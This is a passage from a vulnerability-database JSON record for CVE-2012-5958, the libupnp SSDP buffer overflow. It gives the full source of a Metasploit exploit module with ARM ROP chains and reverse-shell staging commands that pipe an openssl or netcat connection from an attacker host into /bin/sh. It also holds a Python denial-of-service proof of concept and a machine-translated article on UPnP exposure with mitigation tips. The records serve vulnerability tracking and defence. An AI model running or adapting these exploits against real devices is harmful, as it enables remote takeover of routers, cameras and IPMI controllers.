UPnP Devices or the Portable SDK for UPnP Devices. 
Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload.\n", "published": "2013-02-03T23:46:20", "type": "metasploit", "title": "Portable UPnP SDK unique_service_name() Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/UPNP/LIBUPNP_SSDP_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',\n 'Description' => %q{\n This module exploits a buffer overflow in the unique_service_name()\n function of libupnp's SSDP processor. The libupnp library is used across\n thousands of devices and is referred to as the Intel SDK for UPnP\n Devices or the Portable SDK for UPnP Devices.\n\n Due to size limitations on many devices, this exploit uses a separate TCP\n listener to stage the real payload.\n },\n 'Author' => [\n 'hdm', # Exploit dev for Supermicro IPMI\n 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI\n 'Richard Harman <richard[at]richardharman.com>', # Binaries, system info, testing for Supermicro IPMI\n 'Frederic Basse <contact[at]fredericb.info>' # Exploit dev for Axis Camera M1011\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-5958' ],\n [ 'OSVDB', '89611' ],\n [ 'US-CERT-VU', '922681' ],\n [ 'URL', 'https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]\n ],\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'DefaultOptions' => { 'WfsDelay' => 10 },\n 'Payload' =>\n {\n#\n#\t\t\t\t\t# The following BadChars do not apply since we stage the payload\n#\t\t\t\t\t# through a 
secondary connection. This is just for reference.\n#\n#\t\t\t\t\t'BadChars' =>\n#\t\t\t\t\t\t# Bytes 0-8 are not allowed\n#\t\t\t\t\t\t[*(0..8)].pack(\"C*\") +\n#\t\t\t\t\t\t# 0x09, 0x0a, 0x0d are allowed\n#\t\t\t\t\t\t\"\\x0b\\x0c\\x0e\\x0f\" +\n#\t\t\t\t\t\t# All remaining bytes up to space are restricted\n#\t\t\t\t\t\t[*(0x10..0x1f)].pack(\"C*\") +\n#\t\t\t\t\t\t# Also not allowed\n#\t\t\t\t\t\t\"\\x7f\\x3a\" +\n#\t\t\t\t\t\t# Breaks our string quoting\n#\t\t\t\t\t\t\"\\x22\",\n\n # Unlimited since we stage this over a secondary connection\n 'Space' => 8000,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n # specific payloads vary widely by device (openssl for IPMI, etc)\n }\n },\n 'Targets' =>\n [\n\n [ \"Automatic\", { } ],\n\n #\n # ROP targets are difficult to represent in the hash, use callbacks instead\n #\n [ \"Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1\", {\n\n # The callback handles all target-specific settings\n :callback => :target_supermicro_ipmi_131,\n\n # This matches any line of the SSDP M-SEARCH response\n :fingerprint =>\n /Server:\\s*Linux\\/2\\.6\\.17\\.WB_WPCM450\\.1\\.3,? 
UPnP\\/1\\.0, Intel SDK for UPnP devices\\/1\\.3\\.1/mi\n #\n # SSDP response:\n #\tLinux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\n #\thttp://192.168.xx.xx:49152/IPMIdevicedesc.xml\n #\tuuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\n\n # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)\n\n } ],\n [ \"Axis Camera M1011 5.20.1 UPnP/1.4.1\", {\n\n # The callback handles all target-specific settings\n :callback => :target_axis_m1011_141,\n\n # This fingerprint may not be specific enough to be used automatically.\n #:fingerprint =>\n #\t/SERVER:\\s*Linux\\/2\\.6\\.31, UPnP\\/1\\.0, Portable SDK for UPnP devices\\/1\\.4\\.1/mi\n #\n # SSDP response:\n #\tLinux/2.6.31, UPnP/1.0, Portable SDK for UPnP devices/1.4.1\n #\thttp://192.168.xx.xx:49152/rootdesc1.xml\n #\tuuuid:Upnp-BasicDevice-1_0-00123456789A::upnp:rootdevice\n\n } ],\n\n [ \"Debug Target\", {\n\n # The callback handles all target-specific settings\n :callback => :target_debug\n\n } ]\n\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2013-01-29'))\n\n register_options(\n [\n Opt::RHOST(),\n Opt::RPORT(1900),\n OptAddress.new('CBHOST', [ false, \"The listener address used for staging the real payload\" ]),\n OptPort.new('CBPORT', [ false, \"The listener port used for staging the real payload\" ])\n ])\n end\n\n\n def exploit\n\n configure_socket\n\n target_info = choose_target\n\n unless self.respond_to?(target_info[:callback])\n print_error(\"Invalid target specified: no callback function defined\")\n return\n end\n\n buffer = self.send(target_info[:callback])\n pkt =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:uuid:schemas:device:\" + buffer + \":end\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:3\\r\\n\\r\\n\"\n\n print_status(\"Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...\")\n\n udp_sock.sendto(pkt, rhost, rport, 0)\n\n 1.upto(5) do\n 
::IO.select(nil, nil, nil, 1)\n break if session_created?\n end\n\n # No handler() support right now\n end\n\n\n\n # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc\n def target_supermicro_ipmi_131\n\n # Create a fixed-size buffer for the payload\n buffer = Rex::Text.rand_text_alpha(2000)\n\n # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()\n buffer[0,1] = '\"'\n buffer[1999,1] = '\"'\n\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener(true)\n\n # Figure out the port we picked\n cbport = self.service.getsockname[2]\n\n # Restart the service and use openssl to stage the real payload\n # Staged because only ~150 bytes of contiguous data are available before mangling\n cmd = \"sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#\"\n buffer[432, cmd.length] = cmd\n\n # Adjust $r3 to point from the bottom of the stack back into our buffer\n buffer[304,4] = [0x4009daf8].pack(\"V\") #\n # 0x4009daf8:\tadd\tr3, r3, r4, lsl #2\n # 0x4009dafc:\tldr\tr0, [r3, #512]\t; 0x200\n # 0x4009db00:\tpop\t{r4, r10, pc}\n\n # The offset (right-shifted by 2 ) to our command string above\n buffer[284,4] = [0xfffffe78].pack(\"V\") #\n\n # Copy $r3 into $r0\n buffer[316,4] = [0x400db0ac].pack(\"V\")\n # 0x400db0ac <_IO_wfile_underflow+1184>:\tsub\tr0, r3, #1\n # 0x400db0b0 <_IO_wfile_underflow+1188>:\tpop\t{pc}\t\t; (ldr pc, [sp], #4)\n\n # Move our stack pointer down so as not to corrupt our payload\n buffer[320,4] = [0x400a5568].pack(\"V\")\n # 0x400a5568 <__default_rt_sa_restorer_v2+5448>:\tadd\tsp, sp, #408\t; 0x198\n # 0x400a556c <__default_rt_sa_restorer_v2+5452>:\tpop\t{r4, r5, pc}\n\n # Finally return to system() with $r0 pointing to our string\n buffer[141,4] = [0x400add8c].pack(\"V\")\n\n return 
buffer\n=begin\n 00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev\n 00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev\n 00032000-00055000 rwxp 00000000 00:00 0 [heap]\n 40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so\n 40015000-40017000 rwxp 00000000 00:00 0\n 4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so\n 4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so\n 4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so\n 4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so\n 40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so\n 40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so\n 40036000-40078000 rwxp 00000000 00:00 0\n 40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so\n 40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so\n 40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so\n 40185000-40187000 rwxp 00000000 00:00 0\n bd600000-bd601000 ---p 00000000 00:00 0\n bd601000-bd800000 rwxp 00000000 00:00 0\n bd800000-bd801000 ---p 00000000 00:00 0\n bd801000-bda00000 rwxp 00000000 00:00 0\n bdc00000-bdc01000 ---p 00000000 00:00 0\n bdc01000-bde00000 rwxp 00000000 00:00 0\n be000000-be001000 ---p 00000000 00:00 0\n be001000-be200000 rwxp 00000000 00:00 0\n be941000-be956000 rwxp 00000000 00:00 0 [stack]\n=end\n\n end\n\n # These devices are armv5tejl, run version 1.4.1 of libupnp, have random stacks, but no PIE on libc\n def target_axis_m1011_141\n\n # Create a fixed-size buffer for the payload\n buffer = Rex::Text.rand_text_alpha(2000)\n\n # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()\n buffer[0,1] = '\"'\n buffer[1999,1] = '\"'\n\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener()\n\n # Figure out the port we picked\n 
cbport = self.service.getsockname[2]\n\n # Initiate a callback connection\n cmd = \"sleep 1; /usr/bin/nc #{cbhost} #{cbport}|/bin/sh;exit;#\"\n buffer[1, cmd.length] = cmd\n\n # Mask to avoid forbidden bytes, popped into $r4\n buffer[284,4] = [0x0D0D0D0D].pack(\"V\")\n\n # Move $r4 to $r0\n buffer[304,4] = [0x40093848].pack(\"V\")\n #MEMORY:40093848 MOV R0, R4\n #MEMORY:4009384C LDMFD SP!, {R4,PC}\n\n # Masked system() address (0x32FB9D83 + 0x0D0D0D0D = 0x4008AA90), popped into $r4\n buffer[308,4] = [0x32FB9D83].pack(\"V\")\n\n # Set $r0 to system() address : $r0 = $r4 + $r0\n buffer[312,4] = [0x40093844].pack(\"V\")\n #MEMORY:40093844 ADD R4, R4, R0\n #MEMORY:40093848 MOV R0, R4\n #MEMORY:4009384C LDMFD SP!, {R4,PC}\n\n # Move $r0 to $r3 : system() address\n buffer[320,4] = [0x400D65BC].pack(\"V\")\n #MEMORY:400D65BC MOV R3, R0\n #MEMORY:400D65C0 MOV R0, R3\n #MEMORY:400D65C4 ADD SP, SP, #0x10\n #MEMORY:400D65C8 LDMFD SP!, {R4,PC}\n\n # Move $r2 to $r0 : offset to buffer[-1]\n buffer[344,4] = [0x400ADCDC].pack(\"V\")\n #MEMORY:400ADCDC MOV R0, R2\n #MEMORY:400ADCE0 ADD SP, SP, #8\n #MEMORY:400ADCE4 LDMFD SP!, {R4-R8,PC}\n\n # Negative offset to command str($r0 + 0xFFFFFEB2 = buffer[1]), popped into R4\n buffer[356,4] = [0xFFFFFEB2].pack(\"V\")\n\n # Set $r0 to command str offset : $r0 = $r4 + $r0\n buffer[376,4] = [0x40093844].pack(\"V\")\n #MEMORY:40093844 ADD R4, R4, R0\n #MEMORY:40093848 MOV R0, R4\n #MEMORY:4009384C LDMFD SP!, {R4,PC}\n\n # Jump to system() function\n buffer[384,4] = [0x4009FEA4].pack(\"V\")\n #MEMORY:4009FEA4 MOV PC, R3\n\n return buffer\n=begin\n 00008000-0002b000 r-xp 00000000 1f:03 62 /bin/libupnp\n 00032000-00033000 rwxp 00022000 1f:03 62 /bin/libupnp\n 00033000-00055000 rwxp 00000000 00:00 0 [heap]\n 40000000-4001d000 r-xp 00000000 1f:03 235 /lib/ld-2.9.so\n 4001d000-4001f000 rwxp 00000000 00:00 0\n 40024000-40025000 r-xp 0001c000 1f:03 235 /lib/ld-2.9.so\n 40025000-40026000 rwxp 0001d000 1f:03 235 /lib/ld-2.9.so\n 40026000-4002e000 r-xp 
00000000 1f:03 262 /lib/libparhand.so\n 4002e000-40035000 ---p 00008000 1f:03 262 /lib/libparhand.so\n 40035000-40036000 rwxp 00007000 1f:03 262 /lib/libparhand.so\n 40036000-4004a000 r-xp 00000000 1f:03 263 /lib/libpthread-2.9.so\n 4004a000-40051000 ---p 00014000 1f:03 263 /lib/libpthread-2.9.so\n 40051000-40052000 r-xp 00013000 1f:03 263 /lib/libpthread-2.9.so\n 40052000-40053000 rwxp 00014000 1f:03 263 /lib/libpthread-2.9.so\n 40053000-40055000 rwxp 00000000 00:00 0\n 40055000-4016c000 r-xp 00000000 1f:03 239 /lib/libc-2.9.so\n 4016c000-40173000 ---p 00117000 1f:03 239 /lib/libc-2.9.so\n 40173000-40175000 r-xp 00116000 1f:03 239 /lib/libc-2.9.so\n 40175000-40176000 rwxp 00118000 1f:03 239 /lib/libc-2.9.so\n 40176000-40179000 rwxp 00000000 00:00 0\n 40179000-4017a000 ---p 00000000 00:00 0\n 4017a000-40979000 rwxp 00000000 00:00 0\n 40979000-4097a000 ---p 00000000 00:00 0\n 4097a000-41179000 rwxp 00000000 00:00 0\n 41179000-4117a000 ---p 00000000 00:00 0\n 4117a000-41979000 rwxp 00000000 00:00 0\n 41979000-4197a000 ---p 00000000 00:00 0\n 4197a000-42179000 rwxp 00000000 00:00 0\n 42179000-4217a000 ---p 00000000 00:00 0\n 4217a000-42979000 rwxp 00000000 00:00 0\n 42979000-4297a000 ---p 00000000 00:00 0\n 4297a000-43179000 rwxp 00000000 00:00 0\n bef4d000-bef62000 rw-p 00000000 00:00 0 [stack]\n=end\n\n end\n\n # Generate a buffer that provides a starting point for exploit development\n def target_debug\n Rex::Text.pattern_create(2000)\n end\n\n def stage_real_payload(cli)\n print_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\n cli.put(payload.encoded + \"\\n\")\n end\n\n def start_listener(ssl = false)\n\n comm = datastore['ListenerComm']\n if comm == \"local\"\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n self.service = Rex::Socket::TcpServer.create(\n 'LocalPort' => datastore['CBPORT'],\n 'SSL' => ssl,\n 'SSLCert' => datastore['SSLCert'],\n 'Comm' => comm,\n 'Context' =>\n {\n 'Msf' => 
framework,\n 'MsfExploit' => self,\n })\n\n self.service.on_client_connect_proc = Proc.new { |client|\n stage_real_payload(client)\n }\n\n # Start the listening service\n self.service.start\n end\n\n #\n # Shut down any running services\n #\n def cleanup\n super\n if self.service\n print_status(\"Shutting down payload stager listener...\")\n begin\n self.service.deref if self.service.kind_of?(Rex::Service)\n if self.service.kind_of?(Rex::Socket)\n self.service.close\n self.service.stop\n end\n self.service = nil\n rescue ::Exception\n end\n end\n end\n\n def choose_target\n # If the user specified a target, use that one\n return self.target unless self.target.name =~ /Automatic/\n\n msearch =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:upnp:rootdevice\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:3\\r\\n\\r\\n\"\n\n # Fingerprint the service through SSDP\n udp_sock.sendto(msearch, rhost, rport, 0)\n\n res = nil\n 1.upto(5) do\n res,_,_ = udp_sock.recvfrom(65535, 1.0)\n break if res and res =~ /^(Server|Location)/mi\n udp_sock.sendto(msearch, rhost, rport, 0)\n end\n\n self.targets.each do |t|\n return t if t[:fingerprint] and res =~ t[:fingerprint]\n end\n\n if res and res.to_s.length > 0\n print_status(\"No target matches this fingerprint\")\n print_status(\"\")\n res.to_s.split(\"\\n\").each do |line|\n print_status(\" #{line.strip}\")\n end\n print_status(\"\")\n else\n print_status(\"The system #{rhost} did not reply to our M-SEARCH probe\")\n end\n\n fail_with(Failure::NoTarget, \"No compatible target detected\")\n end\n\n # Accessor for our TCP payload stager\n attr_accessor :service\n\n # We need an unconnected socket because SSDP replies often come\n # from a different sent port than the one we sent to. 
This also\n # breaks the standard UDP mixin.\n def configure_socket\n self.udp_sock = Rex::Socket::Udp.create({\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self }\n })\n add_socket(self.udp_sock)\n end\n\n #\n # Required since we aren't using the normal mixins\n #\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\n\n # Accessor for our UDP socket\n attr_accessor :udp_sock\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb"}], "packetstorm": [{"lastseen": "2020-11-28T17:52:51", "description": "", "published": "2020-11-26T00:00:00", "type": "packetstorm", "title": "libupnp 1.6.18 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958"], "modified": "2020-11-26T00:00:00", "id": "PACKETSTORM:160242", "href": "https://packetstormsecurity.com/files/160242/libupnp-1.6.18-Denial-Of-Service.html", "sourceData": "`# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS) \n# Date: 2020-08-20 \n# Exploit Author: Patrik Lantz \n# Vendor Homepage: https://pupnp.sourceforge.io/ \n# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download \n# Version: <= 1.6.6 \n# Tested on: Linux \n# CVE : CVE-2012-5958 \n \nimport socket \n \npayload = \"M-SEARCH * HTTP/1.1\\r\\nHOST: 239.255.255.250:1900\\r\\nST:uuid:schemas:device:\" \npayload += \"A\"*324 + \"BBBB\" \npayload += \":urn:\\r\\nMX:2\\r\\nMAN:\\\"ssdp:discover\\\"\\r\\n\\r\\n\" \n \nbyte_message = bytes(payload) \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.sendto(byte_message, (\"239.255.255.250\", 1900)) \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160242/libupnp1618-dos.txt"}], "myhack58": [{"lastseen": "2019-03-28T22:38:03", "bulletinFamily": 
"info", "cvelist": ["CVE-2013-0229", "CVE-2013-0230", "CVE-2007-1204", "CVE-2017-1000494", "CVE-2012-5958", "CVE-2014-8361"], "description": "Earlier this year, Chromecast streaming dongle, Google Home devices and smart TV users are forced to harvest a strip from the youtube PewDiePie channel promotion information. This hijacking is said by the tube top traffic UP the main are a fan of the battle for the thrown. Reported that hackers exploit the improperly configured router, these routers enable the universal plug and play(Universal Plug \u2013 and \u2013 Play, abbreviated UPnP)service, resulting in the router the public port to the private device and the public Internet open. \nMany devices such as cameras, printers and routers, use the UPnP Protocol, so that it can automatically find and check local other devices on the network, and can communicate with each other to share data or stream media. But it brings convenience, but also brings security risks, such as from attacker-controlled devices to bypass the firewall protection, etc., to name a few. \nIn the above event, we investigated a home network with UPnP-related events, found that many users of the device still using the UPnP Protocol. \n\n! [](/Article/UploadPic/2019-3/20193292294895.jpg) \nTable 1. Enabled UPnP for major equipment types \nThis year 1 month, we detected 76 per cent of the router to enable the UPnP Protocol, and 27% of media equipment such as DVD player and media streaming device is also enabled UPnP. Once the UPnP vulnerability be exploited by attackers, a router or other device easily becomes the agent, and then become confused botnets, distributed denial of service attacks([DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>))or spam campaigns the source, and let people almost can't track malicious activity implementation. 
Such cases have occurred before: vulnerabilities in a router's UPnP implementation were used to force it to connect to ports and send spam or other malicious messages. \nThe IoT botnet Satori became infamous for exploiting a UPnP vulnerability. That vulnerability, CVE-2014-8361, is a command injection vulnerability in the miniigd UPnP SOAP interface of the Realtek SDK. An advisory for this vulnerability, with appropriate mitigation measures, was published in May 2015, but according to the latest data we collected, many devices still use older, possibly vulnerable UPnP versions. \n\n![](/Article/UploadPic/2019-3/20193292295992.png) \nFigure 1. Shodan results for UPnP, data as of March 5, 2019 \nThe online search engine Shodan can show the number and distribution of devices worldwide that use the UPnP protocol. Scanning for the standard port 1900 used by UPnP, we retrieved 1,649,719 results. The following table lists some of the well-known UPnP libraries; MiniUPnPd and Custom (Broadcom's UPnP library) are the ones most used by the devices found. \n![](/Article/UploadPic/2019-3/20193292297936.jpg) \nTable 2. The top three UPnP libraries in the Shodan results, data as of March 5, 2019 \nUPnP-related vulnerabilities and the state of home network devices \nUsing our own scanning tool, we studied the UPnP libraries used in home and other small network environments, to determine the factors that may leave devices vulnerable to attack. In short, we found that most devices still use older versions of UPnP libraries, and the vulnerabilities in these libraries have been public for many years. \nMiniUPnPd \nData from our IoT scanning tool shows that 16% of UPnP-enabled devices use the MiniUPnPd library. MiniUPnPd is a well-known UPnP daemon that provides port mapping protocol services for NAT (Network Address Translation) routers. 
Interestingly, we detected devices with older versions of MiniUPnPd installed: 24% use MiniUPnPd 1.0, 30% use MiniUPnPd 1.6, and only 5% of the devices use a MiniUPnPd 2.x version (miniupnpd 2.1 is the latest version). \n![](/Article/UploadPic/2019-3/20193292298107.jpg) \nTable 3. Share of each MiniUPnPd version in use \nDevices running older versions of the daemon must be updated to close known high-risk vulnerabilities. For example, CVE-2013-0230 is a stack-based buffer overflow in the ExecuteSoapAction function of MiniUPnPd version 1.0 that allows an attacker to execute arbitrary code; CVE-2013-0229 is a vulnerability in the ProcessSSDPRequest function of MiniUPnPd before 1.4 that allows an attacker to cause a denial of service (DoS) through a request that triggers a buffer over-read; CVE-2017-1000494 is an uninitialized stack variable vulnerability in MiniUPnPd before version 2.0 that allows attackers to cause a DoS (segmentation fault and memory corruption). \nWindows UPnP server \nWe also found that 18% of the devices use Windows-based UPnP. For these devices, especially Microsoft Windows XP computers (Windows NT 5.1), check whether the MS07-019 patch has been applied. (Note that Windows XP reached end of life in April 2014, which means it is no longer supported by Microsoft and its security issues will no longer be fixed.) Windows XP comes with UPnP functionality available out of the box, and the patch fixes the UPnP memory corruption vulnerability CVE-2007-1204, which allows a remote attacker to run arbitrary code in the context of the local service account. \nLibupnp, the portable SDK for UPnP devices \nlibupnp, the portable software development kit (SDK) for UPnP devices, is another well-known UPnP library; it supports a variety of [OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>a). 
According to our data, 5% of the detected devices use the libupnp library package. That is not a large proportion, but we note that most devices with this library run versions before 1.6.18/1.6.19 (the current version is 1.8.4). Versions before 1.6.18 have a stack-based buffer overflow in the unique_service_name function, CVE-2012-5958, which allows a remote attacker to execute arbitrary code via a User Datagram Protocol (UDP) packet. \nConclusions \nFor users, determining whether a device has a UPnP-related vulnerability or has been infected is tricky. Some devices may be hidden behind NAT, so that even if a vulnerability exists, the user will not immediately see the risk. To prevent exploitation of UPnP-related vulnerabilities, users should ensure that their devices are updated. If you suspect a device is infected, restart it, reset it to its original factory settings, or, to be prudent, replace it altogether. Unless the network requires UPnP to be enabled on a device, it is best to disable it where the device allows. Note, however, that turning off UPnP may also disable some features, including functions that local devices depend on, and may cause requests from devices to be ignored. \nHome users can also take these measures to increase security: \n1. Scan the home network with Trend Micro's HouseCall home network tool and check which devices have UPnP port 1900 open. \n2. Go to the device's settings page (for example, the router's settings page) to disable UPnP. \n3. Manually configure port forwarding settings as needed. 
\n\n", "edition": 1, "modified": "2019-03-29T00:00:00", "published": "2019-03-29T00:00:00", "id": "MYHACK58:62201993392", "href": "http://www.myhack58.com/Article/html/3/62/2019/93392.htm", "title": "Next from the printer coming out will be?-- The theory of the UPnP using the status quo and risk-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}